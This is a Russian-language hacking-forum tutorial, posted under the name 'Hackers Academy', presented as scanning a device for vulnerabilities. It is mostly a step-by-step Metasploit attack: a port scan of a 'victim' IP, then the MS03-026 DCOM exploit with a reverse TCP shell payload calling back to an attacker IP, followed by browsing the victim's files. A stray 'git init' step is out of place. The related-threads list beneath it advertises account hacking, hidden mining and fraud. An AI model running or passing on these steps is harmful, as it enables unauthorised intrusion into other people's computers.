Как просканировать любое устройство на уязвимости?

H

Hackers Academy

Original poster
Салом КулХацкер!

И так сегодня у нас пойдет речь о Кибербезопасности.Ведь чтобы просканировать устройство на уязвимости.Для этого не обязательно знать все эксплоиты.

Сегодня мы будем использовать Metasploit.Ни все знают одну фишку метасплоита.И попытаемся не только просканировать устройство.Но и взломать его.У нас же как сказать канал про Хакеров.Совместим полезное с приятным.

Ну что ж приступим.

Можно такие действия повторять что и в linux что и в termux

Разницы нет

В kali , parrot , black arch он уже встроен.Чтобы его запустить просто пропишем команду :

msfconsole

В Termux нужно устанавливать

Для начала установим metasploit

apt update

apt install unstable-repo

apt install metasploit

Команда запуска:

msfconsole

Все мы запустили Metasploit

Теперь мы пишем команду

db_status

для проверки состояния базы данных метасплоита.

Если у вас Connected

Как на скриншоте

e449c4db1c79b8c5be6f9.png

Значит все в порядке.

Пропишем команду для старта пользования

git init



use auxiliary/scanner/portscan/tcp -Команда для сканирования открытых портов.

set PORTS 1-5000 - количество открытых портов .От 1 до 5000

set RHOSTS 192.168.88.161 - Вводим IP жертвы

run - команда запуска

search dcom - работа с эксплоитами dcom

4c3e74c2cf0ac551ed85d.png

У нас появляется вот такая панель.С эксплоитами.Выбираем тот эксплоит на котором написано No и ранг эксплоита great.Который подходит для взлома.Можно конечно выбрать любой.Но врятли он будет подходить для взлома.В данном случае я буду использовать эксплоит exploit/windows/dcerpc/ms03_026_dcom

Для этого пропишем команду

use exploit/windows/dcerpc/ms03_026_dcom

set payload windows/shell_reverse_tcp - команда для создания полезной нагрузки самая часто используемая для взлома.

show options - Команда для проверки того что нам нужно заполнить перед началом запуска эксплоита

7c9bee64c3d6a9f5bd475.png

Как мы видем у нас здесь не заполнено поле IP жертвы и IP злоумышленника

set RHOSTS 192.168.88.161 (IP той машины, которую будем проверять на защищенность)

set LHOST 192.168.88.247 - IP злоумышленника

run - команда запуска эксплоита.Если не работает пишем команду exploit



cd ..\..\ - команда для перехода в директорию файлов

Я прописал команду dir

Чтобы получить доступ ко всем файлам жертвы

cd5d54bfabbcbbc1b7b0e.png

Прописывая следующую команду мы можем создать текстовый файл.И послать жертве письмо

71f575842bc2e6cca046b.png



echo Hello! (кнопка стрелки на Ю) achtung.x



Ну вот и все ребят.Мы выполнили взлом жертвы Компьютера.За одно и просканировали на уязвимости.Как говорится полезное с приятным.

Ну а с вами был ФCБ! Подписывайтесь на мой профиль UfoLabs и на мой телеграм канал Hackers Academy -

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

 
Z

zhurav

Original poster
Здравствуйте! А можно по подробнее для чего надо было сканировать открытые порты если вы не взяли их в расчет ? и хотелось бы узнать на какую систему вы проводили атаку, что за ОС? были ли на ней файрвол и антивирь!?
 
Название темы
Автор Заголовок Раздел Ответы Дата
Emilio_Gaviriya Статья Metadata Cleaner: Как эффективно защитить свою приватность при обмене файлами. Анонимность и приватность 0
Emilio_Gaviriya Как вычислить местоположение по IP-адресу? Статьи 0
Emilio_Gaviriya Статья Как работает JSON Web Token. Анонимность и приватность 0
Emilio_Gaviriya Статья Как происходит ICMP атака. Уязвимости и взлом 0
Emilio_Gaviriya Статья Как ловить хакеров на живца. Уязвимости и взлом 0
Emilio_Gaviriya Как работать с Search4Faces. Статьи 0
Emilio_Gaviriya Статья Как найти Wi-Fi точки. WiFi/Wardriving/Bluejacking 0
Emilio_Gaviriya Статья Как распространяются вирусы? Вирусология 0
Emilio_Gaviriya Статья Как найти человека? Полезные статьи 4
Emilio_Gaviriya Статья Как обнаружить 10 популярных техник пентестеров. Уязвимости и взлом 0
Emilio_Gaviriya Статья Как работает Анти-DDoS. Уязвимости и взлом 0
Emilio_Gaviriya Статья Как получают привязанный к Telegram мобильный номер. Анонимность и приватность 0
Emilio_Gaviriya Статья Как заразить компьютер с помощью обычного ярлыка. Полезные статьи 0
Emilio_Gaviriya Статья Защита конфиденциальности: Как сбросить данные на Android в экстренных ситуациях. Полезные статьи 0
Emilio_Gaviriya Статья Безопасность в сети: Как избежать угроз при использовании коротких ссылок. Уязвимости и взлом 0
Emilio_Gaviriya Статья Как вас деанонимизируют силовики. Анонимность и приватность 0
Emilio_Gaviriya Статья Как следит провайдер? Анонимность и приватность 1
Emilio_Gaviriya Статья Как вычисляют мобильник? Анонимность и приватность 0
Support81 Как хакеры взломали мир: 14 самых громких взломов 2023 года Новости в сети 1
DELTABEK Как зарабатывать 100.000 рублей в день на арбитраже криптовалют? Способы заработка 5
Support81 Как минимум 7 друзей ShadowSyndicate: компании всего мира под прицелом киберальянса Новости в сети 0
Support81 Как взломать сайт за 5 минут: уязвимость в плагине Ultimate Member дает полный доступ к WordPress Новости в сети 0
Traven Как создать свою криптовалюту без знаний и зарабатывать 40000$ в месяц (паста) Способы заработка 0
yaNaSvyazi [Wealth Whispers] [Udemy] Как использовать ChatGPT для YouTube (2023) Способы заработка 0
yaNaSvyazi [Виталий Бруновский] [Udemy] Как заработать с помощью ChatGPT? (2023) Способы заработка 0
yaNaSvyazi [Катерина Яшина] Как заработать на нейросетях первым (2023) Способы заработка 0
alexgoldboy Как вернуть убытки на Pocket Option? Ищу работу. Предлагаю свои услуги. 1
Gorsilov Подскажите что с етими базами делать? и Как? Вопросы и интересы 0
D Как поставить лайк? или убрать хайд? может ли не показываться кнопка лайка? Вопросы и интересы 7
yaNaSvyazi Как заработать на продаже курсов подготовки к ЕГЭ Способы заработка 0
S Как отменить отправленную транзакцию Bitcoin Свободное общение и флейм 0
A Как взломать аккаунт в инстограме Вопросы и интересы 1
I Как слать Zelle с Chase Полезные статьи 0
L Как отменить отправленную транзакцию BTC Корзина 0
D Как найти клон страницы ВК Вопросы и интересы 1
N Как подключится к видеокамерам сервера зная пароль отт маршрутизатора? Вопросы и интересы 5
M Закрыто Обучение Google ADS. Как лить на любые фейки без суспенда. + Продам логи без соседей + гугл разбаны ручной фарм Корзина 2
semsvm Интересно Как можно заработать на кошельке Payeer. Способы заработка 1
S Как сейчас купить доллары в РФ? Свободное общение и флейм 3
AHAHAC Интересно Как просто начать скрытый майнинг Способы заработка 1
Alldied Как заработать около $1000 на американской бирже. Способы заработка 1
Dolphin Anty Как выбрать антидетект браузер ❓ Продажа софта 0
F Промокоды OZON. Как покупать с максимальной выгодой, руководство. Другое 0
W Слив [Blackhatworld] Как Зарабатывать Деньги С Youtube И Content Locker (2021) Способы заработка 0
D Как из обычного шнура сделать шнур juice jacking? Уязвимости и взлом 7
D Как взломать телефон с помощью зарядки juice jacking? Уязвимости и взлом 2
S ⏩ Как запустить свой товарный бизнес и начать зарабатывать, кейс. Способы заработка 0
W [Алексей Лунин] Как зарабатывать 30000-45000 на продажах партнерских товаров в яндекс директе (2021) Способы заработка 0
M Как получить кредит с США? Вопросы и интересы 1
S Интересно Как зарабатывать на Mobile Rewards. Фея с подарками. Способы заработка 0

Название темы